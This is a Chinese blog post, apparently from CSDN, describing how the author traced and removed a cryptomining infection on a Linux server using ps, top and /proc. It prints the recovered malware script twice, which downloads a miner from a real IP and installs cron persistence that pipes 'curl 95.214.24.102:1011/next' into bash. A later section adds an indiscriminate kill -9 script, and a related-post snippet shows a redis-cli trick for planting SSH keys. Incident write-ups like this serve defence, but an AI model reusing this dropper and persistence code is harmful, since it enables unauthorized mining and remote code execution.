Linux下CPU1000%记一次挖矿病毒清理流程

已于 2024-05-30 15:52:44 修改
阅读量596 收藏 11
点赞数 5
文章标签: 服务器 linux 运维
于 2024-05-29 11:41:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuanzelin8/article/details/139289986
版权

今天top后发现一个进程CPU高1795%,判断是病毒

查找进程ps -elf|grep 进程idpid和ppid查找到sleep进程

ps -ef|grep 4277

查看具体进程内容,ll /proc/进程idpid

ll /proc/4277

ls -l /proc/{pid号}
ls -l /proc/{pid号}/exe

 kill掉病毒进程

 排查病毒代码位置

排查 www用户执行所有进程

ps -ef|grep www 发现

36239 www       20   0   76272   4976    452 S   0.3  0.0 174:24.97 .image.jpg
/tmp/.image.jpg (deleted)
www      202401  0.0  0.0 113292  1516 ?        S    07:01   0:00 /var/tmp/.x/secure -c
www      248458      1  0 08:01 ?        00:00:00 /var/tmp/.x/secure -c
www       3241  0.1  0.0 113724  1836 ?        S    4月01 151:10 /bin/sh ./php
www       3243  0.1  0.0 113724  1844 ?        S    4月01 151:49 /bin/sh ./php
/proc/3243/exe -> /usr/bin/bash


/tmp/.XIM-unix/admin/.sftp (deleted)
/tmp/.XIM-unix/admin/.sftp (deleted)
exe -> /usr/bin/bash



#!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ ?link1="http://95.214.24.102:6972/xrx/xrx" ?link2="http://95.214.24.102:6972/configs/config-xrx.json" ?mkdir /var/tmp/.xrx ?cd /var/tmp/.xrx/ ?chattr -ia /var/tmp/.xrx/xrx ?chattr -ia /var/tmp/.xrx/config.json ?rm -rf /var/tmp/.xrx/xrx ?rm -rf /var/tmp/.xrx/config.json ?curl  -L -O $link1 || cd1  -L -O $link1 || wget $link1 --no-check-certificate ?curl  -L -O $link2 || cd1  -L -O $link2 || wget $link2 --no-check-certificate ?mv config-xrx.json config.json ?chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then ?if ! crontab -l | grep -q 'secure'; then ?cd /dev/shm ?rm -rf /dev/shm/.spark ?echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?echo "*/30 * * * * curl 95.214.24.102:1011/next | bash " >> .spark ?crontab .spark ?sleep 2 ?rm -rf /dev/shm/.spark ?fi fi if (( $EUID == 0 )); then ?if ! cat /etc/crontab | grep -q 'secure'; then ?echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?echo "*/30 * * * * root curl 95.214.24.102:1011/next | bash " >> /etc/crontab ?fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then ?echo "miner intact" ?else ?echo "miner not found,downloading..." ?downloadminer fi if [[ "$fsiz" -gt 0 ]]; then ?echo "miner size intact" ?else ?echo "filesize 0,downloading..." ?downloadminer fi } ######################## ######################## gettingmineru crontablegend  if test -z "$ifrunning" ; then ?echo "xrx not running,starting..." ?/var/tmp/.xrx/xrx </dev/null &>/dev/null & disown  -h  %1 ?sleep 1 ?echo -e "pid:" ?pgrep xrx fi  /var/tmp/.x/secure

 发现病毒文件

www      248458      1  0 08:01 ?        00:00:00 /var/tmp/.x/secure -c

16393 www       20   0  107740  73912      4 S   0.3  0.0   0:03.88 sh
/tmp/.XIM-unix/admin/sh (deleted)



#!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## 

downloadminer(){ ?
link1="http://95.214.24.102:6972/xrx/xrx" ?
link2="http://95.214.24.102:6972/configs/config-xrx.json" ?mkdir /var/tmp/.xrx ?
cd /var/tmp/.xrx/ ?
chattr -ia /var/tmp/.xrx/xrx ?
chattr -ia /var/tmp/.xrx/config.json ?
rm -rf /var/tmp/.xrx/xrx ?
rm -rf /var/tmp/.xrx/config.json ?
curl  -L -O $link1 || cd1  -L -O $link1 || wget $link1 --no-check-certificate ?
curl  -L -O $link2 || cd1  -L -O $link2 || wget $link2 --no-check-certificate ?
mv config-xrx.json config.json ?chmod +x /var/tmp/.xrx/xrx }
 ######################## ######################## 
crontablegend(){ if (( $EUID != 0 )); then ?
if ! crontab -l | grep -q 'secure'; then ?
cd /dev/shm ?
rm -rf /dev/shm/.spark ?
echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?
sleep 1 ?
echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?
echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark ?sleep 1 ?
echo "*/30 * * * * curl 95.214.24.102:1011/next | bash " >> .spark ?crontab .spark ?
sleep 2 ?rm -rf /dev/shm/.spark ?fi fi if (( $EUID == 0 )); then ?
if ! cat /etc/crontab | grep -q 'secure'; then ?
echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab ?
echo "*/30 * * * * root curl 95.214.24.102:1011/next | bash " >> /etc/crontab ?fi fi }
 ######################## ######################## 
gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then ?
echo "miner intact" ?else ?echo "miner not found,downloading..." ?
downloadminer fi if [[ "$fsiz" -gt 0 ]]; then ?echo "miner size intact" ?else ?
echo "filesize 0,downloading..." ?downloadminer fi } 
######################## ######################## 
gettingmineru crontablegend  if test -z "$ifrunning" ; then ?echo "xrx not running,starting..." ?
/var/tmp/.xrx/xrx </dev/null &>/dev/null & disown  -h  %1 ?sleep 1 ?echo -e "pid:" ?pgrep xrx fi  /var/tmp/.x/secure

查找进程ps -elf|grep 进程idpid和ppid查找到sleep进程 

 

 病毒执行代码

#!/bin/bash
cd -- /tmp/.XIM-unix/admin
cp -f -- .sh sh
./sh -c >/dev/null 2>&1
./.php -c >/dev/null 2>&1
rm -rf sh

 删除病毒代码

rm -rf admin

----------------------------------------------------------------------------------------

解决 linux top cpu超100 kill 脚本

在Linux系统中,top命令是一个常用的性能分析工具,它可以实时显示系统的进程信息。如果您希望监控CPU使用率超过100%的进程,并在发现时杀死这些进程,可以编写一个简单的脚本来实现这个功能。

以下是一个简单的Bash脚本示例,它会定期运行top命令,并在发现CPU使用率超过100%的情况下杀死相应的进程:

#!/bin/bash
 
# 定义一个函数来检查CPU使用率并杀死进程
check_kill_process() {
    top_output=$(top -b -n 1 | grep "R" | awk '{if($9 > 100.0) print $1}')
    for pid in $top_output; do
        kill -9 $pid 2>/dev/null
        echo "Killed PID $pid because its CPU usage is greater than 100%"
    done
}
 
# 主循环,每隔一定时间运行检查函数
while true; do
    check_kill_process
    sleep 5  # 每隔5秒检查一次
done

请注意,该脚本使用了top命令的-b(批处理模式)和-n(指定循环次数)选项,以及管道(|)和grepawk等命令来分析和处理输出。脚本会无限循环地运行,每5秒检查一次系统进程的CPU使用情况,并在发现CPU使用率超过100%时杀死相应的进程。

在运行这个脚本之前,请确保您对其中使用的命令和行为有足够的了解,并且已经考虑到了可能对系统稳定性造成的影响。此外,这个脚本应该在有足够权限的用户下运行,通常是root用户。

yuanzelin8
关注
【瞎折腾日常】服务器cpu飙高到1000%了怎么破
全糖少冰我吃不了苦
07-02 262
起因是用户反馈系统很卡,我登录普罗米修斯一看,发现docker部署得集群下的一个java应用服务器cpu爆了,直接冲到了1000%以上了,接着就是各种接口超时报警等,赶紧打开对应的服务器查看进程情况,这会使用jstack和top命令定位哪个线程占用的cpu比较大,定位代码问题。代码中调用的某些资源造成的死锁或者是代码的死循环导致的cpu超频计算,或者长时间占用cpu的操作,像一些递归的使用、循环操作等等,或者一些特别复杂的正则匹配引起;程序中存在大量的数据库操作,导致数据库连接池的耗尽和数据库负载过高。
彻底清除SSHD挖矿病毒_清除定时下载启动病毒程序_centos7安全防护_CPU占用率超过百分之300_centos7.4中毒CPU百分之百_清理毒源---Linux工作笔068
添柴程序猿的专栏
12-11 666
sshd占用cpu百分之300多...而且就算是kill -9 杀掉进程以后,进程又会自动启动。我们执行这个命令,可以看到有个/var/tmp/sshd的文件。rm -rf sshd删除这个文件,然后我们再去top可以看到。我们进入cd /var/tmp。
Linux服务器防护+对抗挖矿病毒流程探索
最新发布
weixin_44197439的博客
09-09 965
服务器中了两次挖矿病毒一次一次厉害。在此录一下杀毒全过程,为了永久解决这个问题,也寻找了常见的安全防护方法,为后来作参考。
Linux挖矿病毒清理流程
ouxx2009的专栏
03-14 1万+
Linux挖矿病毒清理流程 1.前言: 根据阿里云快讯病毒公布: Redis RCE导致h2Miner蠕虫病毒,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。在以往常见的攻击者或蠕虫中,其大多都沿用登陆redis后写入定时任务或写ssh key的方式进行入侵,这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis加载module的攻击方式,可以直接执行任意指令或拿到shell交互环境,危害
Linux挖矿程序清除
延成的博客
09-01 1309
【代码】Linux挖矿程序清除。
Linux服务器挖矿病毒处理
自己在学习过程中的总结
06-19 2382
情况说明:挖矿进程被隐藏(CPU占用50%,htop/top却看不到异常进程),结束挖矿进程后马上又会运行起来(crontab -l查看发现没有定时任务)。1.中毒表现 2.解决办法:断网并修改root密码,找出隐藏的挖矿进程,关闭病毒启动服务,杀掉挖矿进程 3. 防止黑客再次入侵:查找异常IP,封禁异常IP,查看是否有陌生公钥。中毒表现:服务器是24核的,前12核的CPU占用一直处于100%,即使重启服务器,马上就会占用12核的CPU,并且系统内存占用也很大。在没有使用软件的情况下,CPU使用率很高。
linux挖矿病毒清理
yb890102的博客
01-05 1538
网络安全,挖矿病毒清流,linux中毒
Linux挖矿病毒清理通用思路
dayouzi的博客
04-19 3907
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
linux x11 挖矿病毒,应急响应:一次花样贼多的挖矿病毒
weixin_39542093的博客
05-13 576
一次 “无文件”、“无进程”,在系统中 “几乎” 看不到异常的高配挖矿病毒处置实例 。0x00 正经的内容介绍本文录了一次表象是 “无文件”、“无进程”,在系统中 “几乎” 看不到异常的高配挖矿病毒处置实例 ,包括处置过程,以及逆向分析其 原理实现,感兴趣的朋友我们一起抽丝剥茧,拨云见日。? 通过本文可以收获到:几个Linux应急处置小知识看不到文件、网络、进程?背后的原理解析!几个过时的表情包...
一次centos中挖矿病毒处理经过
a345203172的专栏
10-08 1721
环境:centos7.6 挖矿进程:rabiit 1、先关闭无用对外端口 (例如redis端口,mysql端口等),限制可以ssh登录的ip地址,可以用last查看近期远程登录的用户,确认是否存在可疑IP或者用户 2、查看定时任务情况(这个可以查看/var/log/cron文件,是否存在可疑定时任务执行日志),查看可以定时任务的启动位置,删除可疑定时任务 crontab -e /var/spool/cron/ /etc/crontab /etc/cr...
一次清理挖矿病毒的过程
邓邓子的博客
07-05 1317
网站挂掉了,查看后台服务已宕掉,无法正常重启。在没有启动任何服务的情况下,内存已基本被耗尽: 2.查看各进程资源使用情况 看到 xmrig 占用了资源。 查看 root 文件内容: 查看 .moneroocean 目录下文件: 4.删除文件 5.杀掉 xmrig 进程 查找所有的 xmrig 进程并杀掉: 6.重启服务 最好重启下服务器再重启服务,此时服务已正常。......
Linux服务器挖矿病毒彻底清除与防护实操指南
boydoy1987的专栏
08-07 1133
Linux服务器在遭受挖矿病毒攻击时,会严重影响其性能和数据安全。本文将提供一套详细的操作步骤,结合实际案例,帮助您彻底清除Linux服务器上的挖矿病毒,并实施有效的防护措施。
linux挖矿病毒排查-实操
w_kndy的博客
11-03 865
linux挖矿排查实战,看这一篇就够了
服务器top命令cpu利用率1000%状况
热门推荐
qq_33160535的博客
08-25 1万+
用实验室服务器跑程序,ubuntu,12cpu,结果一看top命令,cpu那列显示1000多,相当惊讶经过在网上搜索,发现top命令显示的是占用的cpu总数。即8cpu时top下cpu利用率最大可以到达800%。如果你的进程利用了多个cpu,那么top命令显示的是多个cpu占用率的总和。
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1560
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
应急响应:挖矿木马-实战 案例一.【Linux 系统-排查和删除】
网络安全领域___专研者.
08-18 1049
挖矿病毒是一种恶意软件,它在用户不知情的情况下利用用户的计算机资源进行虚拟货币挖矿,从而获取利益。这种病毒的传播方式多样,包括通过垃圾邮件、软件捆绑、系统漏洞以及网页脚本等途径 。
Linux——挖矿病毒(sysupdate, networkservice进程)清除解决方案
无限迭代中......
04-16 5184
问题描述 Linux进程 阿里云管理控制台看看CPU占用率 解决方案 top命令 获取进程号 查看进程运行的文件位置 ls 命令 ls -l proc/{进程号}/exe sysupdate、networkservice都在/etc/目录下 到etc下,除了sysupdate、networkservice 同时还有sysguard、update.sh...
如何快速发现linux系统有挖矿病毒
weixin_47450720的博客
03-17 3036
查看进程信息:使用ps命令查看系统的进程信息,查找到异常的进程,可以通过kill命令结束这些进程。使用系统监控工具:可以使用系统自带的top、htop等工具或第三方监控工具,查看系统的CPU、内存、网络等资源占用情况,如果发现异常占用情况,可能存在挖矿病毒。检查系统日志:查看系统日志文件,如/var/log/messages等文件,查找到异常日志信息,可以分析日志文件,确认是否存在挖矿病毒。要及时发现并清除挖矿病毒,需要经常监控系统的运行情况,及时发现异常情况,并结合多种手段进行分析和排查。
linux挖矿病毒查杀
09-10
要查杀Linux挖矿病毒,首先需要识别病毒的特征。根据引用提供的信息,挖矿病毒Linux系统中的一个重要特征是CPU占用率非常高。然而,为了更好地隐藏自己,一些挖矿病毒会控制CPU的占用率,使其保持在50%以下,这可能导致传统的进程监控命令如top无法查看到高占用CPU的进程。因此,如果系统出现异常的CPU占用率,但是无法通过传统命令看到高占用CPU的进程,这可能是挖矿病毒的一种表现。引用 中提到的挖矿病毒还可能修改DNS录,以防止病毒无法访问矿池或代理服务器。因此,检查"/etc/resolv.conf"文件的内容是否被修改也是一种查杀挖矿病毒的方法。如果发现DNS录被修改,可以通过还原DNS录来阻止挖矿病毒的连接。引用还提到,停止计划任务也是一种查杀挖矿病毒的措施。由于挖矿病毒通常会在系统启动时自动启动,可以检查计划任务以查看是否有可疑的任务,然后停止这些任务来阻止病毒的继续操作。综上所述,查杀Linux挖矿病毒的方法包括检查异常的CPU占用率、检查DNS录是否被修改、停止计划任务等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值